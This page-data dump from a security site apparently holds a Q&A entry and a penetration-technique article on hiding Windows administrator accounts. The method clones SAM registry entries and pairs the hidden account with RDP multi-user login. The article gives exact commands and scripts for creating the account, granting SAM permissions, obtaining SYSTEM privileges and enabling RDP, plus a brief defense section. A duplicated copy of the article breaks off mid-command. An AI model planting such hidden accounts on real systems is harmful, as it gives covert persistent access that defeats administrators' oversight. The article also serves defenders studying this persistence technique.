[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fE5Yf6hglCL32UdMsdsyMXmGb3wBQTCQF3pO86OhppUI":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},580,"What exploitation issues arise when combining hidden accounts with remote desktop multi-user login?","When you clone an existing account's permissions to create a hidden account, the cloned account inherits the original account's identity. If the original account is already logged in (e.g., via RDP), logging in with the hidden clone will kick the original user out because the system sees them as the same account. This behavior is similar to the conflicts described in [Penetration Techniques - Multi-user Login for Windows Remote Desktop](\u002Fnews\u002Fpenetration-techniques-multi-user-login-for-windows-remote-desktop). Additionally, if you clone a disabled Administrator account, the hidden account will also be disabled.","\u003Cp>When you clone an existing account&#39;s permissions to create a hidden account, the cloned account inherits the original account&#39;s identity. If the original account is already logged in (e.g., via RDP), logging in with the hidden clone will kick the original user out because the system sees them as the same account. This behavior is similar to the conflicts described in [Penetration Techniques - Multi-user Login for Windows Remote Desktop](\u002Fnews\u002Fpenetration-techniques-multi-user-login-for-windows-remote-desktop). Additionally, if you clone a disabled Administrator account, the hidden account will also be disabled.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-account-hiding-in-windows-systems\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-exploitation-issues-arise-when-combining-hidden-accounts-with-remote-deskto-1777483054944","remote desktop, multi-user login, account conflict, cloning exploitation",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},143,"Penetration Techniques - Account Hiding in Windows Systems","penetration-techniques-account-hiding-in-windows-systems","Learn advanced Windows account hiding via registry cloning, combined with remote desktop multi-user login exploitation techniques for penetration testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In a previous article, 'Penetration Techniques - Multi-User Login for Windows System Remote Desktop,' we discussed the exploitation techniques for Windows system remote desktop, achieving multi-user remote login on non-server versions of Windows. Recently, Evilcg and I have researched the exploitation techniques for hidden accounts through account cloning. What exploitation techniques can be achieved by combining these two? This article will introduce them one by one.\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Methods for account hiding\u003C\u002Fli>\u003Cli>Script implementation approach\u003C\u002Fli>\u003Cli>Exploitation ideas combined with remote desktop multi-user login\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Methods for Account Hiding\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This method has been documented online; this section will only briefly reproduce it.\u003C\u002Fp>\u003Cp>Test system: Win7x86\u003C\u002Fp>\u003Ch3>1. Granting permissions to the registry\u003C\u002Fh3>\u003Cp>The default registry key HKEY_LOCAL_MACHINE\\SAM\\SAM\\ can only be modified with system privileges.\u003C\u002Fp>\u003Cp>Now it is necessary to add administrator permissions to it.\u003C\u002Fp>\u003Cp>Right-click - Permissions - Select Administrators, allow full control.\u003C\u002Fp>\u003Cp>As shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017969127_0_85b9543015.jpeg\">\u003C\u002Fp>\u003Cp>Restart the registry editor regedit.exe to gain modification permissions for this key.\u003C\u002Fp>\u003Ch3>2. Create a special account\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net user test$ 123456 \u002Fadd\u003Cbr>net localgroup administrators test$ \u002Fadd\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The username must end with $.\u003C\u002Fp>\u003Cp>After adding, this account can be hidden under certain conditions; entering net user cannot retrieve it, as shown below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017975550_1_1ea4a0bbd0.jpeg\">\u003C\u002Fp>\u003Cp>However, the account can be discovered in the Control Panel.\u003C\u002Fp>\u003Cp>As shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017986090_2_ecfa7f77e9.jpeg\">\u003C\u002Fp>\u003Ch3>3. Export the registry\u003C\u002Fh3>\u003Cp>Locate the newly created account test$ under the registry key HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\u003C\u002Fp>\u003Cp>Obtain the default type 0x3ea\u003C\u002Fp>\u003Cp>Export the registry key HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\test$ as 1.reg\u003C\u002Fp>\u003Cp>Find the corresponding registry entry HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003EA under the registry based on the type name\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017990587_3_fea26cb48f.jpeg\">\u003C\u002Fp>\u003Cp>Right-click and export this key as 2.reg; the saved file information is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017995111_4_e2d592de40.jpeg\">\u003C\u002Fp>\u003Cp>By default, the registry key value corresponding to the administrator account Administrator is HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4\u003C\u002Fp>\u003Cp>Similarly, right-click and export this key as 3.reg\u003C\u002Fp>\u003Cp>Replace the value of key F under the registry key HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003EA with the value of key F under HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4, i.e., replace the value of key F in 2.reg with the value of key F in 3.reg\u003C\u002Fp>\u003Cp>After replacement, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017998266_5_224ebc074e.jpeg\">\u003C\u002Fp>\u003Ch3>4. Delete special account via command line\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net user test$ \u002Fdel\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>5. Import registry files\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>regedit \u002Fs 1.reg\u003Cbr>regedit \u002Fs 2.reg\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Hidden account creation completed. Account test$ does not appear in Control Panel\u003C\u002Fp>\u003Cp>The account cannot be listed via net user\u003C\u002Fp>\u003Cp>The account also cannot be listed in Computer Management - Local Users and Groups - Users\u003C\u002Fp>\u003Cp>But it can be viewed using the following method:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net user test$\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018001607_6_f9960e3ce7.jpeg\">\u003C\u002Fp>\u003Cp>Cannot delete this user via net user test$ \u002Fdel, prompts 'user does not belong to this group', as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018007422_7_37203a62ab.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Deletion method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Delete the key values corresponding to the account under the registry HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\ (there are two locations in total)\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The tool HideAdmin can automatically perform the above creation and deletion operations\u003C\u002Fp>\u003Ch2>0x03 Script Implementation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Two approaches using PowerShell scripts:\u003C\u002Fp>\u003Ch3>1. Add edit permissions for the administrator account to the registry\u003C\u002Fh3>\u003Cp>Use regini to register an ini file to grant permissions to the registry and its subkeys\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Grant permissions to the registry using Set-Acl in PowerShell, example code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:SAM\\SAM\\\u003Cbr>$person = [System.Security.Principal.NTAccount]\"Administrators\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"NoPropagateInherit\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.ResetAccessRule($rule)\u003Cbr>Set-Acl HKLM:SAM\\SAM\\Domains\\Account\\Users\\Names $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>However, it does not support permission assignment for subkeys, so this method is not adopted.\u003C\u002Fp>\u003Cp>Save the following content as a.ini:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKEY_LOCAL_MACHINE\\SAM\\SAM\\* [1 17]\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>* represents enumerating all subkeys\u003C\u002Fp>\u003Cp>1 represents Administrators full access\u003C\u002Fp>\u003Cp>17 represents System full access\u003C\u002Fp>\u003Cp>Detailed permission descriptions can be obtained by executing regini in cmd for help, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018009891_8_fc86a3d980.jpeg\">\u003C\u002Fp>\u003Cp>Register via regini:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>regini a.ini\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Evilcg implemented it this way, script address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FRidter\u002FPentest\u002Fblob\u002Fmaster\u002Fpowershell\u002FMyShell\u002FCreate-Clone.ps1\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using * requires system permissions, but only listing the relevant ones requires administrator permissions, for example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKEY_LOCAL_MACHINE\\SAM [1 17]\u003Cbr>HKEY_LOCAL_MACHINE\\SAM\\SAM [1 17]\u003Cbr>HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains [1 17]\u003Cbr>HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account [1 17]\u003Cbr>HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users [1 17]\u003Cbr>HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names [1 17]\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Directly obtain System permissions\u003C\u002Fh3>\u003Cp>In my previous article 'Penetration Techniques - Token Theft and Exploitation', I introduced the method of obtaining system permissions through token duplication\u003C\u002Fp>\u003Cp>Therefore, you can first obtain System permissions, thereby gaining editing rights to the registry\u003C\u002Fp>\u003Cp>A simple way is through Invoke-TokenManipulation.ps1, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FExfiltration\u002FInvoke-TokenManipulation.ps1\u003C\u002Fp>\u003Cp>However, during testing I discovered a bug: using Invoke-TokenManipulation -ImpersonateUser -Username \"nt authority\\system\" cannot switch the current privileges to System authority\u003C\u002Fp>\u003Cp>But you can use Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -Username \"nt authority\\system\" to open a new process with System privileges\u003C\u002Fp>\u003Cp>Next, write a script to implement the registry export and replacement functionality:\u003C\u002Fp>\u003Cul>\u003Cli>Create a test account\u003C\u002Fli>\u003Cli>Export the registry to the temp directory and perform replacement\u003C\u002Fli>\u003Cli>Delete the special account\u003C\u002Fli>\u003Cli>Import the registry file\u003C\u002Fli>\u003C\u002Ful>\u003Cp>My implementation method refers to Evilcg's original version with detailed optimizations. Download link:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x04 Exploitation Approach Combining Remote Desktop Multi-User Login\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>From the above introduction, the advantages of this method can be summarized:\u003C\u002Fp>\u003Cp>\u003Cstrong>Cloning can inherit the permissions of the original account\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The following issues need attention during exploitation:\u003C\u002Fp>\u003Ch3>1. Copy the Administrator account\u003C\u002Fh3>\u003Cp>Note whether the Administrator account is disabled. If disabled, the cloned hidden account will also be disabled\u003C\u002Fp>\u003Ch3>2. Copy an existing account\u003C\u002Fh3>\u003Cp>There is a conflict with duplicate accounts when utilizing 3389 remote login\u003C\u002Fp>\u003Cp>Enable the local 3389 remote login feature via cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" \u002Fv fDenyTSConnections \u002Ft REG_DWORD \u002Fd 00000000 \u002Ff\u003Cbr>REG ADD \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \u002Fv PortNumber \u002Ft REG_DWORD \u002Fd 0x00000d3d \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Using the above method, clone the permissions of account a to create hidden account aaa$\u003C\u002Fp>\u003Cp>If the currently logged-in account on the system is a, logging in with hidden account aaa$ will cause the system to recognize it as account a, resulting in account a being logged out\u003C\u002Fp>\u003Ch3>3. Create a new account and then copy\u003C\u002Fh3>\u003Cp>Further, think boldly\u003C\u002Fp>\u003Cp>Create a new Administrator account b, clone account b, and establish hidden account bbb$\u003C\u002Fp>\u003Cp>Delete Administrator account b, and hidden account bbb$ remains effective\u003C\u002Fp>\u003Ch3>4. Maintenance of the original account\u003C\u002Fh3>\u003Cp>Go even further\u003C\u002Fp>\u003Cp>Clone the permissions of account a to create a hidden account aaa$\u003C\u002Fp>\u003Cp>Change the password of account a, the hidden account aaa$ remains valid\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>To exploit hidden accounts, view the registry HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\\u003C\u002Fp>\u003Cp>Of course, default administrator permissions cannot view it; you need to assign permissions or elevate to System privileges\u003C\u002Fp>\u003Cp>Login records of hidden accounts can be obtained by checking logs\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces related exploitation techniques for hidden accounts. If applied to multi-user login via remote desktop, stealthiness can be greatly improved. From a defensive perspective, sharing this exploitation method helps everyone better understand and defend against it.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In a previous article, 'Penetration Techniques - Multi-User Login for Windows System Remote Desktop,' we discussed the exploitation techniques for Windows system remote desktop, achieving multi-user remote login on non-server versions of Windows. Recently, Evilcg and I have researched the exploitation techniques for hidden accounts through account cloning. What exploitation techniques can be achieved by combining these two? This article will introduce them one by one.\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Methods for account hiding\u003C\u002Fli>\u003Cli>Script implementation approach\u003C\u002Fli>\u003Cli>Exploitation ideas combined with remote desktop multi-user login\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Methods for Account Hiding\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This method has been documented online; this section will only briefly reproduce it.\u003C\u002Fp>\u003Cp>Test system: Win7x86\u003C\u002Fp>\u003Ch3>1. Granting permissions to the registry\u003C\u002Fh3>\u003Cp>The default registry key HKEY_LOCAL_MACHINE\\SAM\\SAM\\ can only be modified with system privileges.\u003C\u002Fp>\u003Cp>Now it is necessary to add administrator permissions to it.\u003C\u002Fp>\u003Cp>Right-click - Permissions - Select Administrators, allow full control.\u003C\u002Fp>\u003Cp>As shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017969127_0_85b9543015-1.jpeg\">\u003C\u002Fp>\u003Cp>Restart the registry editor regedit.exe to gain modification permissions for this key.\u003C\u002Fp>\u003Ch3>2. Create a special account\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net user test$ 123456 \u002Fadd\u003Cbr>net localgroup administrators test$ \u002Fadd\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The username must end with $.\u003C\u002Fp>\u003Cp>After adding, this account can be hidden under certain conditions; entering net user cannot retrieve it, as shown below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017975550_1_1ea4a0bbd0-1.jpeg\">\u003C\u002Fp>\u003Cp>However, the account can be discovered in the Control Panel.\u003C\u002Fp>\u003Cp>As shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017986090_2_ecfa7f77e9-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Export the registry\u003C\u002Fh3>\u003Cp>Locate the newly created account test$ under the registry key HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\u003C\u002Fp>\u003Cp>Obtain the default type 0x3ea\u003C\u002Fp>\u003Cp>Export the registry key HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\test$ as 1.reg\u003C\u002Fp>\u003Cp>Find the corresponding registry entry HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003EA under the registry based on the type name\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017990587_3_fea26cb48f-1.jpeg\">\u003C\u002Fp>\u003Cp>Right-click and export this key as 2.reg; the saved file information is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017995111_4_e2d592de40-1.jpeg\">\u003C\u002Fp>\u003Cp>By default, the registry key value corresponding to the administrator account Administrator is HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4\u003C\u002Fp>\u003Cp>Similarly, right-click and export this key as 3.reg\u003C\u002Fp>\u003Cp>Replace the value of key F under the registry key HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000003EA with the value of key F under HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\000001F4, i.e., replace the value of key F in 2.reg with the value of key F in 3.reg\u003C\u002Fp>\u003Cp>After replacement, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017998266_5_224ebc074e-1.jpeg\">\u003C\u002Fp>\u003Ch3>4. Delete special account via command line\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net user test$ \u002Fdel\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>5. Import registry files\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>regedit \u002Fs 1.reg\u003Cbr>regedit \u002Fs 2.reg\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Hidden account creation completed. Account test$ does not appear in Control Panel\u003C\u002Fp>\u003Cp>The account cannot be listed via net user\u003C\u002Fp>\u003Cp>The account also cannot be listed in Computer Management - Local Users and Groups - Users\u003C\u002Fp>\u003Cp>But it can be viewed using the following method:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net user test$\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018001607_6_f9960e3ce7-1.jpeg\">\u003C\u002Fp>\u003Cp>Cannot delete this user via net user test$ \u002Fdel, prompts 'user does not belong to this group', as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018007422_7_37203a62ab-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Deletion method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Delete the key values corresponding to the account under the registry HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\ (there are two locations in total)\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The tool HideAdmin can automatically perform the above creation and deletion operations\u003C\u002Fp>\u003Ch2>0x03 Script Implementation Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Two approaches using PowerShell scripts:\u003C\u002Fp>\u003Ch3>1. Add edit permissions for the administrator account to the registry\u003C\u002Fh3>\u003Cp>Use regini to register an ini file to grant permissions to the registry and its subkeys\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Grant permissions to the registry using Set-Acl in PowerShell, example code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$acl = Get-Acl HKLM:SAM\\SAM\\\u003Cbr>$person = [System.Security.Principal.NTAccount]\"Administrators\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"None\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"NoPropagateInherit\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.ResetAccessRule($rule)\u003Cbr>Set-Acl HKLM:SAM\\SAM\\Domains\\Account\\Users\\Names $acl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>However, it does not support permission assignment for subkeys, so this method is not adopted.\u003C\u002Fp>\u003Cp>Save the following content as a.ini:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKEY_LOCAL_MACHINE\\SAM\\SAM\\* [1 17]\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>* represents enumerating all subkeys\u003C\u002Fp>\u003Cp>1 represents Administrators full access\u003C\u002Fp>\u003Cp>17 represents System full access\u003C\u002Fp>\u003Cp>Detailed permission descriptions can be obtained by executing regini in cmd for help, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018009891_8_fc86a3d980-1.jpeg\">\u003C\u002Fp>\u003Cp>Register via regini:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>regini a.ini\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Evilcg implemented it this way, script address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FRidter\u002FPentest\u002Fblob\u002Fmaster\u002Fpowershell\u002FMyShell\u002FCreate-Clone.ps1\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using * requires system permissions, but only listing the relevant ones requires administrator permissions, for example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>HKEY_LOCAL_MACHINE\\SAM [1 17]\u003Cbr>HKEY_LOCAL_MACHINE\\SAM\\SAM [1 17]\u003Cbr>HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains [1 17]\u003Cbr>HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account [1 17]\u003Cbr>HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users [1 17]\u003Cbr>HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names [1 17]\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Directly obtain System permissions\u003C\u002Fh3>\u003Cp>In my previous article 'Penetration Techniques - Token Theft and Exploitation', I introduced the method of obtaining system permissions through token duplication\u003C\u002Fp>\u003Cp>Therefore, you can first obtain System permissions, thereby gaining editing rights to the registry\u003C\u002Fp>\u003Cp>A simple way is through Invoke-TokenManipulation.ps1, address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FExfiltration\u002FInvoke-TokenManipulation.ps1\u003C\u002Fp>\u003Cp>However, during testing I discovered a bug: using Invoke-TokenManipulation -ImpersonateUser -Username \"nt authority\\system\" cannot switch the current privileges to System authority\u003C\u002Fp>\u003Cp>But you can use Invoke-TokenManipulation -CreateProcess \"cmd.exe\" -Username \"nt authority\\system\" to open a new process with System privileges\u003C\u002Fp>\u003Cp>Next, write a script to implement the registry export and replacement functionality:\u003C\u002Fp>\u003Cul>\u003Cli>Create a test account\u003C\u002Fli>\u003Cli>Export the registry to the temp directory and perform replacement\u003C\u002Fli>\u003Cli>Delete the special account\u003C\u002Fli>\u003Cli>Import the registry file\u003C\u002Fli>\u003C\u002Ful>\u003Cp>My implementation method refers to Evilcg's original version with detailed optimizations. Download link:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x04 Exploitation Approach Combining Remote Desktop Multi-User Login\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>From the above introduction, the advantages of this method can be summarized:\u003C\u002Fp>\u003Cp>\u003Cstrong>Cloning can inherit the permissions of the original account\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The following issues need attention during exploitation:\u003C\u002Fp>\u003Ch3>1. Copy the Administrator account\u003C\u002Fh3>\u003Cp>Note whether the Administrator account is disabled. If disabled, the cloned hidden account will also be disabled\u003C\u002Fp>\u003Ch3>2. Copy an existing account\u003C\u002Fh3>\u003Cp>There is a conflict with duplicate accounts when utilizing 3389 remote login\u003C\u002Fp>\u003Cp>Enable the local 3389 remote login feature via cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD 